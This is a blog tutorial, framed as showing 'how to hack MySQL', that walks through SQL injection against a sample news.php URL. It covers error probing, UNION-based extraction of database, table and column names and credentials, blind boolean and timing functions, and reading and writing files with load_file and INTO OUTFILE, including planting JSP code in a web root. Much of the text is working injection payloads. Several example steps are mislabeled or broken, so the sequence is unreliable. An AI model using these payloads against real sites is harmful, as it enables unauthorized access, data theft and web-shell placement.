i MySQL injection tutorial – All things in moderation

MySQL injection tutorial

In this article, I will show you how to hack MySQL using SQL injection.

Technique SQL injection supported MySQL

  • UINON query
  • Read, write file
  • Boolean-based Blind
  • Time-based Blind

For example, consider follow url:

http://example.com/news.php?id=1

Suppose the query executed from the server is the following:

SELECT title, content from news where new_id=id

1. Check for vulnerability

We add to the end of URL some characters like ‘ (quote),  ” (double quote)

http://example.com/news.php?id=1'

If we get some error like this “You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ”4” LIMIT 0,1′ at line 1“. That means we have vulnerability SQL injection.

2. Injection

Technique 1: UNION query

  • Find the number of columns:

    To find number of columns we use ORDER BY statement.

    http://example.com/news.php?id=1 ORDER BY 1-- - <-- no error
    http://example.com/news.php?id=1 ORDER BY 2-- - <-- no error
    http://example.com/news.php?id=1 ORDER BY 3-- - <-- error

    We get message like this “Unknown column ‘3’ in ‘order clause’
    That means this site has 2 columns, cause we got an error on 3.

  • Check for UNION query:

    With union query, we can select more data in one SQL statement.
    So we have

    http://example.com/news.php?id=-1 union all select 1,2 -- -

    — is a type of MySQL comment.
    (we already found that number of columns are 2 in section “find number of columns”)
    if we see some numbers on screen, i.e 1 or 2 then the UNION works.

  •  Exploit:

    – Check MySQL version.

    Let say that we have two columns, now we check its version.
    We replace the number 2 with @@version or version() and get something like 4.1.33-log or 5.0.45 or similar.
    it should look like this

    http://example.com/news.php?id=-1 union all select 1,@@version -- -
    

    If you get an error “union + illegal mix of collations (IMPLICIT + COERCIBLE) …”
    What we need is convert() function
    For example:

    http://www.site.com/news.php?id=5 union all select 1,convert(@@version using latin1),3/*
    

    – Enumerate database, table and column name.
    From MySQL 5.0, it has a database named INFORMATION_SCHEMA was created. It allows us to get all information about databases, tables, and columns, as well as procedures and functions.

    Here is a summary of some interesting Views.

    Tables_in_INFORMATION_SCHEMA DESCRIPTION
    ..[skipped].. ..[skipped]..
    SCHEMATA All databases the user has (at least) SELECT_priv
    SCHEMA_PRIVILEGES The privileges the user has for each DB
    TABLES All tables the user has (at least) SELECT_priv
    TABLE_PRIVILEGES The privileges the user has for each table
    COLUMNS All columns the user has (at least) SELECT_priv
    COLUMN_PRIVILEGES The privileges the user has for each column
    VIEWS All columns the user has (at least) SELECT_priv
    ROUTINES Procedures and functions (needs EXECUTE_priv)
    TRIGGERS Triggers (needs INSERT_priv)
    USER_PRIVILEGES Privileges connected User has

    All of this information could be extracted by using known techniques as described in SQL Injection section.

    Example:
    1. Enumerate database

    http://example.com/news.php?id=1 union all select 1,select -- -
    2. enumerate tables
    http://example.com/news.php?id=1 union select 1, schema_name from information_schema.schemata;-- -

    3. Enumerate columns

    http://example.com/news.php?id=1 union select 1, table_name from information_schema.tables where table_schema="owasp";-- -

    4. Dump data table entries.

    http://example.com/news.php?id=1 union select 1, column_name from information_schema.columns where table_schema="owasp" and table_name="admin";-- -

    Now we get dislayed username:password on screen, i.e admin:admin or admin:hashtext

Technique 2: Boolean-based and Time-based Blind SQL injection

For blind SQL injection, there is a set of useful function natively provided by MySQL server.

  • String Length:
    LENGTH(str)
  • Extract a substring from a given string:
    SUBSTRING(string, offset, #chars_returned)
  • Time based Blind Injection: BENCHMARK and SLEEP
    BENCHMARK(#ofcycles,action_to_be_performed )
    The benchmark function could be used to perform timing attacks, when blind injection by boolean values does not yield any results.
    See. SLEEP() (MySQL > 5.0.x) for an alternative on benchmark.

For Example Blind SQL injection:
http://hydrasky.com/2016/05/17/webgoat-attack-blind-sql-injection/
http://hydrasky.com/2016/08/03/blind-sql-injection/

Technique 3: Attack vectors (read, write file)

Write in a File

If the connected user has FILE privileges and single quotes are not escaped, the ‘into outfile’ clause can be used to export query results to a file.

Select * from table into outfile '/tmp/file'

Note: there is no way to bypass single quotes surrounding a filename. So if there’s some sanitization on single quotes like escape (\’) there will be no way to use the ‘into outfile’ clause.
This kind of attack could be used as an out-of-band technique to gain information about the results of a query or to write a file which could be executed inside the web server directory.
Example:

1 limit 1 into outfile '/var/www/root/test.jsp' FIELDS ENCLOSED BY '//'  LINES TERMINATED BY '\n<%jsp code here%>';

Result Expected:
Results are stored in a file with rw-rw-rw privileges owned by MySQL user and group.

Where /var/www/root/test.jsp will contain:

//field values//
<%jsp code here%>

Read from a File

Load_file is a native function that can read a file when allowed by the file system permissions. If a connected user has FILE privileges, it could be used to get the file’s content. Single quotes escape sanitization can by bypassed by using previously described techniques.

load_file('filename')

Result Expected:

The whole file will be available for exporting by using standard techniques.

 

References

MySQL injection cheat sheet: http://pentestmonkey.net/cheat-sheet/sql-injection/mysql-sql-injection-cheat-sheet

Owasp testing guide v4: https://www.owasp.org/index.php/Testing_for_SQL_Server

Leave a Reply